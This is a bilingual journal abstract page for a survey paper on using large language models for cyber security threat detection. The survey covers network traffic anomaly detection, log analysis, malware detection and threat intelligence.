| 引用本文: |
-
宋泽楷,刘锦浩,郑雯,崔苏苏,姜波,韩冬旭,刘奇旭,刘玉岭.大语言模型驱动网络安全威胁检测:进展与趋势[J].信息安全学报,已采用 [点击复制]
- songzekai,liujinhao,zhengwen,cuisusu,jiangbo,handongxu,liuqixu,liuyuling.Large Language Models Driving Cyber Security Threat Detection: Progress and Trends[J].Journal of Cyber Security,Accept [点击复制]
|
|
| 摘要: |
| 在现代科技领域不断演进的背景下,网络安全问题愈发严峻,高级和持续性的威胁攻击不断增加,而且攻击方式愈发隐蔽和复杂。过去的网络安全威胁检测研究中普遍使用基于规则和基于机器学习的威胁检测方法,然而,它们在应对新型和未知威胁方面存在诸多局限性,如基于规则的检测方法过于依赖专家知识,机器学习的检测方法则需要手动提取和挑选特征,这极大的消耗了人力和物力,且使得模型的泛化能力有限。近年来,大语言模型(如GPT-4、BERT、PaLM)为网络安全威胁检测提供了新的解决路径,特别是在大量无标签数据的情境下展示出强大的性能和潜力。本文全面地探究了基于大语言模型的网络威胁检测技术,文章首先归纳了网络威胁检测的核心任务并深入分析各任务当前所面临的挑战,包括网络流量异常检测技术、系统日志分析技术、恶意代码检测技术和威胁情报分析技术。随后,文章概述了大语言模型的一般训练使用流程及主流的大语言模型,并详细分析了近年来大语言模型在网络威胁检测中的应用和潜力。这些大语言模型能自动从大量无标签多模态数据中提取复杂特征,因此在识别恶意代码、异常网络流量等方面显示出强大的性能。最后,基于当前研究进展指出了大语言模型在网络威胁检测领域中依然存在的挑战,如隐私安全问题与可解释性等,并提出了未来研究方向。 |
| 关键词: 网络威胁检测 大语言模型 网络流量异常检测 系统日志检测 恶意代码检测 威胁情报分析 |
| DOI: |
| 投稿时间:2024-02-28修订日期:2024-05-29 |
| 基金项目:网络安全等级保护与安全保卫技术国家工程研究中心开放课题项目(编号:C21640-3)资助 |
|
| Large Language Models Driving Cyber Security Threat Detection: Progress and Trends |
|
songzekai1, liujinhao1, zhengwen2, cuisusu1, jiangbo1, handongxu1, liuqixu1, liuyuling1
|
| (1.Institute of Information Engineering, Chinese Academy of Sciences;2.Qingdao Customs) |
| Abstract: |
| In the context of the continuous evolution of modern science and technology, network security problems are becoming more and more serious. Advanced and persistent threat attacks are increasing, and the attack methods are becoming more and more hidden and complex. Rule-based and machine learning-based threat detection methods have been widely used in the past research on network security threat detection. However, they have many limitations in dealing with new and unknown threats. For example, rule-based detection methods rely too much on expert knowledge, and machine learn-ing-based detection methods need to manually extract and select features, which greatly consumes human and material resources. And the generalization ability of the model is limited. In recent years, large language models (e.g. GPT-4, BERT, PaLM) provide a new solution for network security threat detection, and show strong performance and potential especially in the context of large amounts of unlabeled data. This paper comprehensively explores the network threat detection technology based on large language model. Firstly, this paper summarizes the core tasks of network threat de-tection and deeply analyzes the challenges faced by each task, including network traffic anomaly detection technology, system log analysis technology, malware detection technology and threat intelligence analysis technology. Then, the general training and usage process of large language models and mainstream large language models were summarized, and the application and potential of large language models in network threat detection in recent years were analyzed in detail. These large language models can automatically extract complex features from a large amount of unlabeled mul-timodal data, and thus show strong performance in identifying malicious code, abnormal network traffic, etc. Finally, based on the current research progress, the challenges of large language models in the field of cyber threat detection are pointed out, such as privacy security issues and interpretability, and the future research directions are proposed. |
| Key words: network threat detection large language model network traffic anomaly detection system log detection malicious code detection threat intelligence analysis |
